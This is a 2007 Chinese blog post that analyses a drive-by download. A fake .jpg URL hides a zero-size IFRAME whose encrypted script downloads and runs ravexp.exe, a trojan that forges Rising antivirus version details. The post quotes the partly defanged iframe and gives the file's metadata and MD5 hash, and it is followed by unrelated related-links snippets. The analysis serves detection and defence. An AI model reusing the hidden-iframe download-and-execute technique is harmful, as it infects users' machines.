endurer 原创
2007-01-17 第1版
打开URL:
/------
hxxp://www.%6E%6A***%74%73%69***%73.com/images/ravexpert.jpg
------/
你会看到一张图片,其实这个URL指向的是一个网页,包含代码:
/------
<IFRAME align=center name="target" frameBorder=0 height=0 scrolling=no src="hxxp://www.n**j**tsi**s.com/n**j**s**ex/vip**_reg*.htm"width=0></IFRAME>
------/
vip*_reg**.htm 包含双重加密的脚本代码,第一重是escape()加密的JavaScript代码,第二重是自定义函数rechange(t)加密的VBScript代码,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 ravexp.exe,并利用Shell.Application 对象MircoLonge 的 ShellExecute 方法 来运行。
ravexp.exe 采用PESHiELD 0.1b MTE -> ANAKiN加壳,不仅使用类似瑞星的金狮子头作为图标,而且版本信息是伪造瑞星的:
/------
文件说明符 : D:/test/ravexp.exe
语言 : 中文(中国)
文件版本 : 19.01.0033
说明 : Rising Online Security Expert Support Center
版权 : Copyright ?? 1998 - 2008 Rising Corp. Ltd. All Rights Reserved
备注 :
产品版本 : 19.01.0033
产品名称 : espousal
公司名称 : Beijing Rising Technology Co., Ltd.
合法商标 : Rising
内部名称 : RavExp
源文件名 : RavExp.exe
创建时间 : 2007-1-17 22:45:58
修改时间 : 2007-1-17 22:46:1
访问时间 : 2007-1-17 22:47:17
大小 : 61440 字节 60.0 KB
MD5 : 8acbac220c5b383ca6e322c80ceab66b
------/
分享到:
相关推荐
v1.0.0.5.exe与test.txt放在同一目录,然后在“命令提示符”中输入:“fastcoll_v1.0.0.5.exe -i test.txt -p test.txt -o cbi.exe cbi2.exe”并回车,在同目录中会生成名为cbi.exe和cbi2.exe文件,我们用HashX校验...
把解压出来的fastcoll_v1.0.0.5.exe与test.txt放在同一目录,然后在“命令提示符”中输入:“fastcoll_v1.0.0.5.exe -i test.txt -p test.txt -o cbi.exe cbi2.exe”并回车,在同目录中会生成名为cbi.exe和cbi2.exe...
前几天,同事拿着优盘到我的电脑拷贝...最后打开U盘,在文件夹选项——查看——去掉“隐藏已知扩展名”,之后把C:\WINDOWS\system32\isass.exe和U盘里面那些冒充的所谓“文件夹”的exe文件全部删除; OK,大功告成!
路由器冒充Radius引故障.pdf
一款FLASH格式文件转换工具,用来把FLASH的.EXE格式转换成.SWF格式,可有效防止在可执行FLASH格式文件(.EXE)中插入木马程序,或用FLASH图标的木马冒充FLASH文件。
GandCrab勒索病毒“余孽”,冒充警察邮件钓鱼在韩被捕 业务安全 安全体系 区块链 数据安全 安全运营
信息时代背景下的电信诈骗侦防研究——以河北丰宁冒充黑社会电信诈骗为对象.pdf
计算机后端-PHP视频教程. JS高级冒充.wmv
200斤胖子减肥计划表如何冒充胖子.doc
里面含有PLSQL Developer 9.0.6.1665 的原版安装文件,汉化补丁,注册机。 使用方法:先安装PLSQL 9.0.6.1665,再复制破解文件到安装目录的根目录。...更不是什么修改plsqldev.exe之后的版本.绝对的安全可靠
资源来自网络,经验证确实为中文,不像某些骗子上传一个英文版冒充中文版 因win10系统中无法打开帮助文件 故找了一个winhlp32.exe,可以通过此程序打开.hlp文件 方便大家使用
还有的通过代码注入和dll插入技术,埋伏在系统进程如svchost.exe 或explorer.exe 中,从防火墙的监控日论网络攻击技术与网络安全(全文)全文共6页,当前为第3页。论网络攻击技术与网络安全(全文)全文共6页,当前为第3...
* * * * * * * IP欺骗的攻击与防御 IP欺骗的定义 IP地址欺骗是指行动产生的IP数据包伪造源IP地址,以便冒充其他系统或发件人的身份。 IP欺骗的目的:有效地隐藏攻击者的身份或者为了绕过系统认证过程。 IP欺骗的原理...
甲冒充新闻工作者,以在新闻网站上发布隐私为要挟,向乙、丙、丁等人索取了数十 万财物。 甲的行为应当认定为(A) A。敲诈勒索罪 B.诈骗罪 C.招摇撞骗罪 D。寻衅 滋事罪 5。某公司未经授权,擅自在其经营的...
网络平安小知识 一、如何防范病毒或木马的攻击? 1.为计算机安装杀毒软件,定期扫描系统、查杀病毒; 2.及时更新病毒库、更新系统补丁; 3.下载软件时尽量到官方网站或大型软件下载网站,在安装或翻开来历不明的软件...
而企业中的计算机一旦感染了病毒,清除病毒变得非常 困难,刚刚完成清除工作的计算机就有可能被网络中另一台带毒工作站所感染,使得邮 件病毒变得非常困难了。4、破坏性大。网络中的计算机感染了邮件病毒之后,将...
所有名人代码都被冒充......很糟糕。以下程序包含粗俗的语言,由于其内容,任何人都不应该使用它。雅特Yarte代表Y等甲诺特尔ř乌斯Ťemplateëngine。使用类似于 Handlebars 的语法,对大多数开发人员来说都是...
一旦某个用户不小心感染上了这 种类型的病毒,不会影响到网络中的其他用户,保证了校园网网络带宽的合理使用。 2、未知网络病毒的防范 对于未知的网络病毒,通过在网络中部署基于数据流类型的带宽控制功能,为不同的...
冒充
小学数学数学故事动物王国的百姓15挑出冒充鸡蛋的卵石